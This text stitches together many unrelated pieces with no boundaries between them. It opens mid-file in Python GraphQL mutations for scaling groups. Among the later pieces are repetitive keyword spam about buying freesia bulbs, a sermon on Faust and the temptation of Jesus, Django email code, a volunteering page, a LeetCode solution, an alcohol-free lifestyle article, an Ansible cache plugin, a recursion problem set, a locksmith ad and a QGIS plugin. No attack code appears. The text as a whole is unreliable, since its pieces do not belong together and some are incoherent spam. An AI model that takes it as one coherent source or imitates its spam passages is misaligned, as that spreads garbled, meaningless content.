(sgroups_for_groups.c.group == user_group) ) ) return await simple_db_mutate(cls, info.context, delete_query) class DisassociateAllScalingGroupsWithGroup(graphene.Mutation): allowed_roles = (UserRole.SUPERADMIN,) class Arguments: user_group = graphene.UUID(required=True) ok = graphene.Boolean() msg = graphene.String() @classmethod async def mutate( cls, root, info: graphene.ResolveInfo, user_group: uuid.UUID, ) -> DisassociateAllScalingGroupsWithGroup: delete_query = ( sa.delete(sgroups_for_groups) .where(sgroups_for_groups.c.group == user_group) ) return await simple_db_mutate(cls, info.context, delete_query) class AssociateScalingGroupWithKeyPair(graphene.Mutation): allowed_roles = (UserRole.SUPERADMIN,) class Arguments: scaling_group = graphene.String(required=True) access_key = graphene.String(required=True) ok = graphene.Boolean() msg = graphene.String() @classmethod async def mutate( cls, root, info: graphene.ResolveInfo, scaling_group: str, access_key: str, ) -> AssociateScalingGroupWithKeyPair: insert_query = ( sa.insert(sgroups_for_keypairs) .values({ 'scaling_group': scaling_group, 'access_key': access_key, }) ) return await simple_db_mutate(cls, info.context, insert_query) class DisassociateScalingGroupWithKeyPair(graphene.Mutation): allowed_roles = (UserRole.SUPERADMIN,) class Arguments: scaling_group = graphene.String(required=True) access_key = graphene.String(required=True) ok = graphene.Boolean() msg = graphene.String() @classmethod async def mutate( cls, root, info: graphene.ResolveInfo, scaling_group: str, access_key: str, ) -> DisassociateScalingGroupWithKeyPair: delete_query = ( sa.delete(sgroups_for_keypairs) .where( (sgroups_for_keypairs.c.scaling_group == scaling_group) & (sgroups_for_keypairs.c.access_key == access_key) ) ) return await simple_db_mutate(cls, info.context, delete_query)
where to buy freesia bulbs freesia double yellow where to buy freesia bulbs. where to buy freesia bulbs image titled care for a potted freesia after blooming step 5 where to buy freesia bulbs in australia. where to buy freesia bulbs freesias amazoncom freesia double flowering mix flower bulbs garden freesia double flowering mix flower bulbs. where to buy freesia bulbs freesia bloom shows zygomorphic position of the flowers on the stem where to buy freesia bulbs. where to buy freesia bulbs 10 white single freesia bulbs can you force freesia bulbs tips on forcing freesia bulbs indoors. where to buy freesia bulbs freesia white where to buy freesia bulbs in australia. where to buy freesia bulbs close up of corms c vossner simple steps to fabulous fragrance with freesia easy to grow bulbs freesia bloom shows zygomorphic position of the flowers on the stem. where to buy freesia bulbs double freesia mix pack of 20 are freesia bulbs annuals or perennials hunker are freesia bulbs annuals or perennials. where to buy freesia bulbs image titled grow freesias step 6 where to buy freesia bulbs. where to buy freesia bulbs 100pcsbag freesia gardenfreesia bulbs flower freesia bonsai flower bulbs flowers orchid freesia where to buy freesia bulbs. where to buy freesia bulbs 23425393mjpg where to buy freesia bulbs. where to buy freesia bulbs image titled grow freesias step 8 amazoncom perennial beautiful freesia orange flower bulb perennial beautiful freesia orange flower bulb indoor garden rare bonsai bulbs easy. where to buy freesia bulbs freesia white wonder duo collection where to buy freesia bulbs. where to buy freesia bulbs freesia single white where to buy freesia bulbs. where to buy freesia bulbs made recently where to buy freesia bulbs. where to buy freesia bulbs freesia container care how to grow freesia bulbs in pots where to buy freesia bulbs. where to buy freesia bulbs hot pink freesia flowers where to buy freesia bulbs in australia. where to buy freesia bulbs freesias beautiful fragrant but not easy to grow in most areas where to buy freesia bulbs. where to buy freesia bulbs true yellow freesia bulbs indoor potted flowers orchidsbonsaifloral quiet home garden where to buy freesia bulbs. where to buy freesia bulbs organic fressia at the farmers market where to buy freesia bulbs in australia. where to buy freesia bulbs freesia single white 15 bulbs 6 cm fragrant ships from easy to where to buy freesia bulbs in australia. where to buy freesia bulbs 10 heirloom antique freesias bulbs very fragrant and easy to grow where to buy freesia bulbs in australia. where to buy freesia bulbs where to buy freesia bulbs. where to buy freesia bulbs true freesia bulbsflower freesiabonsai flower bulbs indoor pot flowers orchids freesia rhizome diy home garden plant 2 bulbs in bonsai from home garden where to buy freesia bulbs in australia.
# # This file is part of python-rhev. python-rhev is free software that is # made available under the MIT license. Consult the file "LICENSE" that # is distributed together with this file for the exact licensing terms. # # python-rhev is copyright (c) 2010-2011 by the python-rhev authors. See # the file "AUTHORS" for a complete overview. from rhev import Connection, Error as RhevError from rhevsh.command.command import RhevCommand class DisconnectCommand(RhevCommand): name = 'disconnect' description = 'disconnect from RHEV manager' helptext = """\ == Usage == disconnect == Description == Disconnect an active connection to RHEV manager, if any. This method can be called multiple times. It is not an error to disconnect when not connected. """ def execute(self): stdout = self.context.terminal.stdout connection = self.context.connection if connection is None: stdout.write('not connected\n') return try: connection.close() except RhevError, e: pass stdout.write('disconnected from RHEV manager\n') self.context.connection = None
One of the greatest works in the history of German literature is the play Faust, written by Johann Wolfgang Goethe. Goethe worked on this play on and off for 56 years. He started writing it as a young man of 27 years old, and did not finish it until just before he died in 1832 at the age of 83. It is a long and complex work, getting into deep discussions of science, religion, psychology, philosophy, history, and more. It is not easy reading. But the play’s setting for all those deep discussions is a simple and thought-provoking old German legend about a man who was tempted. The story begins with a conversation in heaven between God and the devil, much like in the story of Job. The devil makes a wager with God, betting that he can steal away from God the soul of a good man, a brilliant scientist named Dr. Faust. Determined to win the bet, the devil goes to work on Dr. Faust. The devil knows what Faust loves, what he wants in life, and what his frustrations are. After a lengthy discussion of all this, the devil makes his move. The devil offers to serve Faust, giving him everything he wants for his entire life, on the condition that when Faust’s life is over the devil may have his soul in hell for all eternity. Dr. Faust, desperate to have everything he wants, and to achieve all his goals, agrees to the offer. After all, he was just a young man, and old age and death were a long ways off. After fasting forty days and forty nights, Jesus was hungry. The tempter came to him and said, “If you are the Son of God, tell these stones to become bread.” Jesus answered, “It is written: ‘Man shall not live on bread alone, but on every word that comes from the mouth of God.’” Then the devil took him to the holy city and had him stand on the highest point of the temple. “If you are the Son of God,” he said, “throw yourself down. For it is written: ‘He will command his angels concerning you, and they will lift you up in their hands, so that you will not strike your foot against a stone.’” Jesus answered him, “It is also written: ‘Do not put the Lord your God to the test.’” Again, the devil took him to a very high mountain and showed him all the kingdoms of the world and their splendor. “All this I will give you,” he said, “if you will bow down and worship me.” Jesus said to him, “Away from me, Satan! For it is written: ‘Worship the Lord your God, and serve him only.’” Then the devil left him, and angels came and attended him. In the second temptation, you need to imagine the human side of Jesus. Jesus is just beginning his ministry and might be wondering about this call by heavenly Father into this work. The devil told Jesus to jump off the temple and let the angels take care of him. It is as if the devil were saying, “Maybe you ought give this religion business a little test. Go ahead and jump, and make sure that God will be taking care of you.” Again Jesus refused, saying “Do not put the Lord your God to the test.” As with Faust, there is a test going on here. But the human Jesus knows that he is the one being tested, and it is not for him to decide to switch roles and start testing God the Father. Then came the biggest temptation of all. Jesus was here to save the world, and the devil offered Jesus all the kingdoms of the world, if only Jesus would fall down and worship him; or, sell his soul, just like what was offered to Dr. Faust. Again Jesus refused, saying that the Lord God alone should be worshiped and served. The devil then left Jesus. Goethe made this clear in his play when Dr. Faust was nearing the end of his life. Life has indeed been full and good. The devil has fulfilled his promise and given Faust everything. But now, life will soon be over and Faust had long ago signed away his eternal hope, and he is in deep despair. The deal he made as a young man was a bad one. Lord God, our strength, the battle of good and evil rages within and around us, and our ancient foe tempts us with his deceits and empty promises. Keep us steadfast in your Word, and, when we fall, raise us again, and restore us through your Son, Jesus Christ, in whose name we pray. Amen.
# -*- coding: utf-8 -*- from django.utils.translation import gettext as _ from django.template.loader import render_to_string from djconfig import config from spirit.core.utils import site_url from spirit.core import tasks from .tokens import ( UserActivationTokenGenerator, UserEmailChangeTokenGenerator) # XXX remove; use tasks for everything def sender(request, subject, template_name, context, to): context['site'] = site_url() context['site_name'] = config.site_name message = render_to_string(template_name, context) # Subject cannot contain new lines subject = ''.join(subject.splitlines()) tasks.send_email(subject, message, to) def send_activation_email(request, user): subject = _("User activation") template_name = 'spirit/user/activation_email.html' token = UserActivationTokenGenerator().generate(user) context = {'user_id': user.pk, 'token': token} sender(request, subject, template_name, context, [user.email, ]) def send_email_change_email(request, user, new_email): subject = _("Email change") template_name = 'spirit/user/email_change_email.html' token = UserEmailChangeTokenGenerator().generate(user, new_email) context = {'token': token} sender(request, subject, template_name, context, [user.email, ])
Volunteering is the giving of unpaid help and a commitment of time and energy by individuals for the benefit of society, the community or the environment. We support and promote all types of volunteering and hold our annual Cheering Volunteering awards celebration event for all of our volunteers in Central Bedfordshire every year. How do I get involved in formal volunteering? Community Voluntary Service (CVS) (link opens in new window) and Community Action Bedfordshire (link opens in new window) run volunteer centre services in Central Bedfordshire. They work with individuals and organisations to promote and develop volunteering so people are inspired to volunteer, have the opportunity to do so, and have excellent volunteering experiences. Voluntary Works (link opens in new window) is a consortium of local voluntary and community sector (VCS) organisations working to promote and support the sector in Central Bedfordshire. We recognise the value of volunteering and the benefits volunteers bring to people’s quality of life. We also recognise the contribution volunteers make to the economic, environmental and social life of the area. A Volunteering Strategy (PDF 587.1KB) is essential to ensure that people willing to volunteer do so in a nurturing and supportive environment. The Volunteering Strategy promotes volunteering, social action and communities doing more for themselves. In Central Bedfordshire volunteers of all ages add great value to the delivery of many local services (delivered by the public, voluntary and community sectors), which many vulnerable people are dependent upon. The Volunteering Strategy gives direction to supporting the demand for and supply of volunteers in areas such as health, social care, the environment, sport, the arts, education and learning, provision of information and advice services, housing, youth work, community development, community transport and many others. We have prepared a Volunteering Portfolio (PDF 523.8KB) to collate information about how we are supporting and encouraging volunteering.
class Solution: def minRemoveToMakeValidV1(self, s: str) -> str: matched, stack = set(), list() for i, c in enumerate(s): if c == "(": stack.append(i) elif c == ")" and len(stack) > 0: matched.add(stack.pop()) matched.add(i) return "".join([c for i, c in enumerate(s) if c not in "()" or i in matched]) def minRemoveToMakeValidV2(self, s: str) -> str: removed, stack = set(), list() for i, c in enumerate(s): if c == "(": stack.append(i) elif c == ")": if len(stack) > 0: stack.pop() else: removed.add(i) removed |= set(stack) return "".join( [c for i, c in enumerate(s) if c not in "()" or i not in removed] ) # TESTS for s, expected in [ ("lee(t(c)o)de)", "lee(t(c)o)de"), ("a)b(c)d", "ab(c)d"), ("))((", ""), ("(a(b(c)d)", "a(b(c)d)"), ]: sol = Solution() actual = sol.minRemoveToMakeValidV1(s) print(f"Minimum Remove to Make '{s}' Valid Parentheses -> {actual}") assert actual == expected assert expected == sol.minRemoveToMakeValidV2(s)
Home » Culture » Scotch on the Rocks. Hold the Scotch. Scotch on the Rocks. Hold the Scotch. It’s not Christmas without mulled wine, not summer without Pimms, not New Year’s without champagne and not a party without copious amounts of not-quite-remembering what happened. As I scroll down my Facebook newsfeed, sitting alone at 2.38am – I really do know how to party – I see “Jager O’clock” (I improved the grammar) and I remember seeing, “wow, the bar is PACKED! LET’S PARTY!”, on Christmas Day. The realisation dawns on me that we, the people of a highly privileged modern society who have it all, have made alcohol synonymous with “fun”. Ignoring the horribly untraditional activity of going to a club on Christmas Day or the lack of memory indicating that a night out must have been a good one, the most prominent issue here is that, as a nation, we need to loosen up. Alcohol being a prerequisite to de-stiffening that British upper lip only serves to make obvious the fact that, truly, we don’t know how to have fun – at least not without removing all capacity to care. Or do we? As someone who has chosen not to periodically wake up with a headache, I’ve managed to live a very fulfilling and fun life without the aid of alcohol to get me laughing. I can write this all down too, because I have the added bonus of remembering what I did. Here is my list of alcohol-free activities for when having a drink just doesn’t tickle your fancy. A fairly obvious start, but let’s not lie, the cinema is a fool-proof fun time. You can laugh, cry, scream or rant for hours about how you could have done a better job. Even the smell of cinema popcorn makes me happy. And, if you’re lucky enough to belong to a well-known fruit-coloured network provider, or have friends that do, you can go every week for less than £5 unless your local cinema is the West End Vue in London’s Leicester Square, in which case don’t expect to pay less than £600 for a ticket. As a child who almost worshipped my favourite pop group (it was always an S Club party), the possibility of getting tickets to see them perform seemed like a once in a life time event. Thankfully, having entered adulthood and learnt that these pop groups were compiled of mere humans, I’ve become aware of the accessibility of music gigs. With tickets for small acoustic sets by up-and-coming artists starting at as little as £10, it’s a perfect way to spend a night with friends listening to great live music. Venues such as Notting Hill’s Tabernacle, St Pancras Old Church and the 02 Academies are constantly featuring artists new and old for those who like a smaller, more intimate gig. This may not seem an obvious source of a good time on paper and it does inherently involve a little bit of hard work, but a group of happy, like-minded people coming together to help those who need it can do nothing but good for the soul. Charity work, feeding the homeless, youth work – you’ll catch the bug and once you pop, you can’t stop! I’ve made some of my closest friends through volunteering and, as human beings; we all have an altruistic streak which means that doing something nice for someone else makes us feel really good. If this is the season for anything in London, it is the season to ice skate. Almost every landmark has had an ice rink stuck in front of it. What better way of soaking up the wintry goodness? The Tower Bridge ice rink may have been on the verge of becoming a swimming pool this year, but the Christmas magic was still alive – and watching people fall into the puddles that were drowning the ice was much funnier to see than the skating itself! Board games don’t only belong to Christmas: they belong everywhere, all the time. They are amazing and the man who devised the concept deserves a medal. These games bring together not only friends, but generations. Alliances formed, friendships challenged, marriages threatened – board games put us through our paces with absolutely no hope of reward at the end. The Monopoly money is fake and the poker chips aren’t worth a thing, but the hours of laughter and shouting most definitely leave you smiling, (unless you just saw a game of Monopoly through to the end, in which case you’re probably struggling to walk). Having discovered ‘Articulate’ this year, I asked my friend if she had heard of it, to which she replied: “Oh yes, that game that breaks up marriages?” Such fun! Good food, good company. The golden ratio. Boy, girl, man, woman or child – the way to all of our hearts is through our stomachs. What could be better than eating food made by someone who can chop onions at the speed of light and then have someone else wash the plates? The drinks can stay at the bar because I’d rather eat 500 calories of chocolate cake than get fat drinking wine. There’s a reason why eating together has never gone out of fashion; it’s in our nature. Let’s raise our glasses (of coke) to good food, good friends and great memories. This very short list is, of course, not exhaustive. Trips to the theatre, museums, sight-seeing, hiking, playing sports and, of course, shopping. All of these things can be enjoyed with or without alcohol but, I think, there remains an underlying fundamental notion that if you can’t loosen up without a drink around friends, then when can you? If you need a stiff drink to laugh with them, maybe you just need new friends. Or to chill out. Shireen Hilmi is the Health Editor at The Platform. She is currently working as a dentist in London, while undertaking her second degree in Medicine.
# (c) 2017, Brian Coca # (c) 2017 Ansible Project # GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) # Make coding more python3-ish from __future__ import (absolute_import, division, print_function) __metaclass__ = type DOCUMENTATION = ''' cache: yaml short_description: YAML formatted files. description: - This cache uses YAML formatted, per host, files saved to the filesystem. version_added: "2.3" author: Brian Coca (@bcoca) options: _uri: required: True description: - Path in which the cache plugin will save the files type: list env: - name: ANSIBLE_CACHE_PLUGIN_CONNECTION ini: - key: fact_caching_connection section: defaults _prefix: description: User defined prefix to use when creating the files env: - name: ANSIBLE_CACHE_PLUGIN_PREFIX ini: - key: fact_caching_prefix section: defaults _timeout: default: 86400 description: Expiration timeout for the cache plugin data env: - name: ANSIBLE_CACHE_PLUGIN_TIMEOUT ini: - key: fact_caching_timeout section: defaults type: integer ''' import codecs import yaml from ansible.parsing.yaml.loader import AnsibleLoader from ansible.parsing.yaml.dumper import AnsibleDumper from ansible.plugins.cache import BaseFileCacheModule class CacheModule(BaseFileCacheModule): """ A caching module backed by yaml files. """ def _load(self, filepath): with codecs.open(filepath, 'r', encoding='utf-8') as f: return AnsibleLoader(f).get_single_data() def _dump(self, value, filepath): with codecs.open(filepath, 'w', encoding='utf-8') as f: yaml.dump(value, f, Dumper=AnsibleDumper, default_flow_style=False)
On 23 June 2016 UK voters will decide whether the UK remains within the European Union. The decision is, of course, significant to each citizen of the UK but it is also of paramount importance to the financial services industry. This client alert analyses what a decision to remain in the EU would mean to the financial services industry given the new UK settlement achieved by the Prime Minister and set out in the European Council Conclusions of 18 and 19 February 2016. It also analyses what a decision to leave the EU could mean for the sector.
# 6.00x Problem Set 5 # # Part 2 - RECURSION # # Problem 3: Recursive String Reversal # def reverseString(aStr): """ Given a string, recursively returns a reversed copy of the string. For example, if the string is 'abc', the function returns 'cba'. The only string operations you are allowed to use are indexing, slicing, and concatenation. aStr: a string returns: a reversed string """ if len(aStr) == 0 or len(aStr) == 1: return aStr else: return aStr[-1] + reverseString(aStr[:-1]) print reverseString('abc') # # Problem 4: X-ian # def x_ian(x, word): """ Given a string x, returns True if all the letters in x are contained in word in the same order as they appear in x. >>> x_ian('eric', 'meritocracy') True >>> x_ian('eric', 'cerium') False >>> x_ian('john', 'mahjong') False x: a string word: a string returns: True if word is x_ian, False otherwise """ if len(x) == 0: return True elif len(x) == 1: return x in word elif x[0] in word: return x_ian(x[1:], word[word.find(x[0])+1:]) else: return False print x_ian('eric', 'meritocracy') print x_ian('eric', 'cerium') print x_ian('sarina', 'czarina') print x_ian('alvin', 'palavering') print x_ian('john', 'mahjong') print x_ian('eric', 'algebraic') # # Problem 5: Typewriter # def insertNewlines(text, lineLength): """ Given text and a desired line length, wrap the text as a typewriter would. Insert a newline character ("\n") after each word that reaches or exceeds the desired line length. text: a string containing the text to wrap. line_length: the number of characters to include on a line before wrapping the next word. returns: a string, with newline characters inserted appropriately. """ #words = text.split() if len(text) < lineLength: return text else: if text[lineLength] == ' ': return text[:lineLength + 1] + '\n' + insertNewlines(text[lineLength + 1:].lstrip(), lineLength) else: if text.find(' ', lineLength - 1) != -1: return text[:text.find(' ', lineLength - 1)] + '\n' + insertNewlines(text[text.find(' ', lineLength-1):].lstrip(), lineLength) else: return text[:] #+ '\n' + insertNewlines(text[:].lstrip(), lineLength) print insertNewlines('Random text to wrap again.', 5) print print insertNewlines('While I expect new intellectual adventures ahead, nothing will compare to the exhilaration of the world-changing accomplishments that we produced together.', 15) print print insertNewlines('Nuh-uh! We let users vote on comments and display them by number of votes. Everyone knows that makes it impossible for a few persistent voices to dominate the discussion.', 20)
24 HR Locksmith in 11356 New York. Need a Locksmith in 11356 New York? Call us 24 Hour to get the best price ! 10% OFF today - 25, April, 2019 !
""" InaSAFE Disaster risk assessment tool developed by AusAid - **QGIS plugin implementation.** Contact : ole.moller.nielsen@gmail.com .. note:: This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. """ from safe.impact_functions.earthquake.earthquake_building_impact import LOGGER __author__ = 'tim@linfiniti.com' __revision__ = '$Format:%H$' __date__ = '10/01/2011' __copyright__ = 'Copyright 2012, Australia Indonesia Facility for ' __copyright__ += 'Disaster Reduction' import os # Import the PyQt and QGIS libraries from PyQt4.QtCore import (QObject, QLocale, QTranslator, SIGNAL, QCoreApplication, Qt, QSettings, QVariant) from PyQt4.QtGui import QAction, QIcon, QApplication, QMessageBox try: # When upgrading, using the plugin manager, you may get an error when # doing the following import, so we wrap it in a try except # block and then display a friendly message to restart QGIS from safe_qgis.exceptions import TranslationLoadError except ImportError: # Note these strings cant be translated. QMessageBox.warning(None, 'InaSAFE', 'Please restart QGIS to use this plugin.') import utilities class Plugin: """The QGIS interface implementation for the Risk in a box plugin. This class acts as the 'glue' between QGIS and our custom logic. It creates a toolbar and menubar entry and launches the InaSAFE user interface if these are activated. """ def __init__(self, iface): """Class constructor. On instantiation, the plugin instance will be assigned a copy of the QGIS iface object which will allow this plugin to access and manipulate the running QGIS instance that spawned it. Args: iface - a Quantum GIS QGisAppInterface instance. This instance is automatically passed to the plugin by QGIS when it loads the plugin. Returns: None. Raises: no exceptions explicitly raised. """ # Save reference to the QGIS interface self.iface = iface self.translator = None self.setupI18n() #print self.tr('InaSAFE') utilities.setupLogger() #noinspection PyArgumentList def setupI18n(self, thePreferredLocale=None): """Setup internationalisation for the plugin. See if QGIS wants to override the system locale and then see if we can get a valid translation file for whatever locale is effectively being used. Args: thePreferredLocale - optional parameter which if set will override any other way of determining locale.. Returns: None. Raises: TranslationLoadException """ myOverrideFlag = QSettings().value('locale/overrideFlag', QVariant(False)).toBool() if thePreferredLocale is not None: myLocaleName = thePreferredLocale elif myOverrideFlag: myLocaleName = QSettings().value('locale/userLocale', QVariant('')).toString() else: myLocaleName = QLocale.system().name() # NOTES: we split the locale name because we need the first two # character i.e. 'id', 'af, etc myLocaleName = str(myLocaleName).split('_')[0] # Also set the system locale to the user overridden local # so that the inasafe library functions gettext will work # .. see:: :py:func:`common.utilities` os.environ['LANG'] = str(myLocaleName) LOGGER.debug('%s %s %s %s' % (thePreferredLocale , myOverrideFlag, QLocale.system().name(), os.environ['LANG'])) myRoot = os.path.abspath(os.path.join(os.path.dirname(__file__), '..')) myTranslationPath = os.path.join(myRoot, 'safe_qgis', 'i18n', 'inasafe_' + str(myLocaleName) + '.qm') if os.path.exists(myTranslationPath): self.translator = QTranslator() myResult = self.translator.load(myTranslationPath) if not myResult: myMessage = 'Failed to load translation for %s' % myLocaleName raise TranslationLoadError(myMessage) QCoreApplication.installTranslator(self.translator) LOGGER.debug('%s %s' % (myTranslationPath, os.path.exists(myTranslationPath))) def tr(self, theString): """We implement this ourself since we do not inherit QObject. Args: theString - string for translation. Returns: Translated version of theString. Raises: no exceptions explicitly raised. """ return QCoreApplication.translate('Plugin', theString) #noinspection PyCallByClass def initGui(self): """Gui initialisation procedure (for QGIS plugin api). This method is called by QGIS and should be used to set up any graphical user interface elements that should appear in QGIS by default (i.e. before the user performs any explicit action with the plugin). Args: None. Returns: None. Raises: no exceptions explicitly raised. """ # Import dock here as it needs to be imported AFTER i18n is set up from safe_qgis.dock import Dock self.dockWidget = None #-------------------------------------- # Create action for plugin dockable window (show/hide) #-------------------------------------- # pylint: disable=W0201 self.actionDock = QAction(QIcon(':/plugins/inasafe/icon.png'), self.tr('Toggle InaSAFE Dock'), self.iface.mainWindow()) self.actionDock.setObjectName('InaSAFEDockToggle') self.actionDock.setStatusTip(self.tr( 'Show/hide InaSAFE dock widget')) self.actionDock.setWhatsThis(self.tr( 'Show/hide InaSAFE dock widget')) self.actionDock.setCheckable(True) self.actionDock.setChecked(True) QObject.connect(self.actionDock, SIGNAL('triggered()'), self.showHideDockWidget) # add to plugin toolbar self.iface.addToolBarIcon(self.actionDock) # add to plugin menu self.iface.addPluginToMenu(self.tr('InaSAFE'), self.actionDock) #-------------------------------------- # Create action for keywords editor #-------------------------------------- self.actionKeywordsDialog = QAction( QIcon(':/plugins/inasafe/keywords.png'), self.tr('InaSAFE Keyword Editor'), self.iface.mainWindow()) self.actionKeywordsDialog.setStatusTip(self.tr( 'Open InaSAFE keywords editor')) self.actionKeywordsDialog.setWhatsThis(self.tr( 'Open InaSAFE keywords editor')) self.actionKeywordsDialog.setEnabled(False) QObject.connect(self.actionKeywordsDialog, SIGNAL('triggered()'), self.showKeywordsEditor) self.iface.addToolBarIcon(self.actionKeywordsDialog) self.iface.addPluginToMenu(self.tr('InaSAFE'), self.actionKeywordsDialog) #-------------------------------------- # Create action for reset icon #-------------------------------------- self.actionResetDock = QAction( QIcon(':/plugins/inasafe/reload.png'), self.tr('Reset Dock'), self.iface.mainWindow()) self.actionResetDock.setStatusTip(self.tr( 'Reset the InaSAFE Dock')) self.actionResetDock.setWhatsThis(self.tr( 'Reset the InaSAFE Dock')) QObject.connect(self.actionResetDock, SIGNAL('triggered()'), self.resetDock) self.iface.addToolBarIcon(self.actionResetDock) self.iface.addPluginToMenu(self.tr('InaSAFE'), self.actionResetDock) #-------------------------------------- # Create action for options dialog #-------------------------------------- self.actionOptions = QAction( QIcon(':/plugins/inasafe/options.png'), self.tr('InaSAFE Options'), self.iface.mainWindow()) self.actionOptions.setStatusTip(self.tr( 'Open InaSAFE options dialog')) self.actionOptions.setWhatsThis(self.tr( 'Open InaSAFE options dialog')) QObject.connect(self.actionOptions, SIGNAL('triggered()'), self.showOptions) self.iface.addToolBarIcon(self.actionOptions) self.iface.addPluginToMenu(self.tr('InaSAFE'), self.actionOptions) #-------------------------------------- # Create action for impact functions doc dialog #-------------------------------------- self.actionImpactFunctionsDoc = QAction( QIcon(':/plugins/inasafe/functions-table.png'), self.tr('InaSAFE Impact Functions Browser'), self.iface.mainWindow()) self.actionImpactFunctionsDoc.setStatusTip(self.tr( 'Open InaSAFE Impact Functions Browser')) self.actionImpactFunctionsDoc.setWhatsThis(self.tr( 'Open InaSAFE Impact Functions Browser')) QObject.connect(self.actionImpactFunctionsDoc, SIGNAL('triggered()'), self.showImpactFunctionsDoc) self.iface.addToolBarIcon(self.actionImpactFunctionsDoc) self.iface.addPluginToMenu(self.tr('InaSAFE'), self.actionImpactFunctionsDoc) # Short cut for Open Impact Functions Doc self.keyAction = QAction("Test Plugin", self.iface.mainWindow()) self.iface.registerMainWindowAction(self.keyAction, "F7") QObject.connect(self.keyAction, SIGNAL("triggered()"), self.keyActionF7) #--------------------------------------- # Create action for minimum needs dialog #--------------------------------------- self.actionMinimumNeeds = QAction( QIcon(':/plugins/inasafe/minimum_needs.png'), self.tr('InaSAFE Minimum Needs Tool'), self.iface.mainWindow()) self.actionMinimumNeeds.setStatusTip(self.tr( 'Open InaSAFE minimum needs tool')) self.actionMinimumNeeds.setWhatsThis(self.tr( 'Open InaSAFE minimum needs tool')) QObject.connect(self.actionMinimumNeeds, SIGNAL('triggered()'), self.showMinimumNeeds) self.iface.addToolBarIcon(self.actionMinimumNeeds) self.iface.addPluginToMenu(self.tr('InaSAFE'), self.actionMinimumNeeds) #-------------------------------------- # create dockwidget and tabify it with the legend #-------------------------------------- self.dockWidget = Dock(self.iface) self.iface.addDockWidget(Qt.RightDockWidgetArea, self.dockWidget) myLegendTab = self.iface.mainWindow().findChild(QApplication, 'Legend') if myLegendTab: self.iface.mainWindow().tabifyDockWidget( myLegendTab, self.dockWidget) self.dockWidget.raise_() # # Hook up a slot for when the current layer is changed # QObject.connect(self.iface, SIGNAL("currentLayerChanged(QgsMapLayer*)"), self.layerChanged) # # Hook up a slot for when the dock is hidden using its close button # or view-panels # QObject.connect(self.dockWidget, SIGNAL("visibilityChanged (bool)"), self.toggleActionDock) # pylint: disable=W0201 def unload(self): """Gui breakdown procedure (for QGIS plugin api). This method is called by QGIS and should be used to *remove* any graphical user interface elements that should appear in QGIS. Args: None. Returns: None. Raises: no exceptions explicitly raised. """ # Remove the plugin menu item and icon self.iface.removePluginMenu(self.tr('InaSAFE'), self.actionDock) self.iface.removeToolBarIcon(self.actionDock) self.iface.removePluginMenu(self.tr('InaSAFE'), self.actionKeywordsDialog) self.iface.removeToolBarIcon(self.actionKeywordsDialog) self.iface.removePluginMenu(self.tr('InaSAFE'), self.actionResetDock) self.iface.removeToolBarIcon(self.actionResetDock) self.iface.removePluginMenu(self.tr('InaSAFE'), self.actionOptions) self.iface.removeToolBarIcon(self.actionOptions) self.iface.removePluginMenu(self.tr('InaSAFE'), self.actionMinimumNeeds) self.iface.removeToolBarIcon(self.actionMinimumNeeds) self.iface.removePluginMenu(self.tr('InaSAFE'), self.actionImpactFunctionsDoc) self.iface.removeToolBarIcon(self.actionImpactFunctionsDoc) self.iface.mainWindow().removeDockWidget(self.dockWidget) self.dockWidget.setVisible(False) self.dockWidget.destroy() QObject.disconnect(self.iface, SIGNAL("currentLayerChanged(QgsMapLayer*)"), self.layerChanged) def toggleActionDock(self, checked): """check or uncheck the toggle inaSAFE toolbar button. This slot is called when the user hides the inaSAFE panel using its close button or using view->panels .. see also:: :func:`Plugin.initGui`. Args: checked - if actionDock has to be checked or not Returns: None. Raises: no exceptions explicitly raised. """ self.actionDock.setChecked(checked) # Run method that performs all the real work def showHideDockWidget(self): """Show or hide the dock widget. This slot is called when the user clicks the toolbar icon or menu item associated with this plugin. It will hide or show the dock depending on its current state. .. see also:: :func:`Plugin.initGui`. Args: None. Returns: None. Raises: no exceptions explicitly raised. """ if self.dockWidget.isVisible(): self.dockWidget.setVisible(False) else: self.dockWidget.setVisible(True) self.dockWidget.raise_() def showMinimumNeeds(self): """Show the minimum needs dialog. This slot is called when the user clicks the minimum needs toolbar icon or menu item associated with this plugin. .. see also:: :func:`Plugin.initGui`. Args: None. Returns: None. Raises: no exceptions explicitly raised. """ # import here only so that it is AFTER i18n set up from safe_qgis.minimum_needs import MinimumNeeds myDialog = MinimumNeeds(self.iface.mainWindow()) myDialog.show() def showOptions(self): """Show the options dialog. This slot is called when the user clicks the options toolbar icon or menu item associated with this plugin .. see also:: :func:`Plugin.initGui`. Args: None. Returns: None. Raises: no exceptions explicitly raised. """ # import here only so that it is AFTER i18n set up from safe_qgis.options_dialog import OptionsDialog myDialog = OptionsDialog(self.iface.mainWindow(), self.iface, self.dockWidget) myDialog.show() def showKeywordsEditor(self): """Show the keywords editor. This slot is called when the user clicks the keyword editor toolbar icon or menu item associated with this plugin .. see also:: :func:`Plugin.initGui`. Args: None. Returns: None. Raises: no exceptions explicitly raised. """ # import here only so that it is AFTER i18n set up from safe_qgis.keywords_dialog import KeywordsDialog if self.iface.activeLayer() is None: return myDialog = KeywordsDialog(self.iface.mainWindow(), self.iface, self.dockWidget) myDialog.setModal(True) myDialog.show() def showImpactFunctionsDoc(self): """Show the keywords editor. This slot is called when the user clicks the impact functions toolbar icon or menu item associated with this plugin .. see also:: :func:`Plugin.initGui`. Args: None. Returns: None. Raises: no exceptions explicitly raised. """ # import here only so that it is AFTER i18n set up from safe_qgis.impact_functions_doc import ImpactFunctionsDoc myDialog = ImpactFunctionsDoc(self.iface.mainWindow()) myDialog.show() def resetDock(self): """Reset the dock to its default state. This slot is called when the user clicks the reset icon in the toolbar or the reset menu item associated with this plugin .. see also:: :func:`Plugin.initGui`. Args: None. Returns: None. Raises: no exceptions explicitly raised. """ self.dockWidget.getLayers() def layerChanged(self, theLayer): """Enable or disable the keywords editor icon. This slot is called when the user clicks the keyword editor toolbar icon or menu item associated with this plugin .. see also:: :func:`Plugin.initGui`. Args: None. Returns: None. Raises: no exceptions explicitly raised. """ if theLayer is None: self.actionKeywordsDialog.setEnabled(False) else: self.actionKeywordsDialog.setEnabled(True) self.dockWidget.layerChanged(theLayer) def keyActionF7(self): '''Executed when user press F7''' self.showImpactFunctionsDoc()
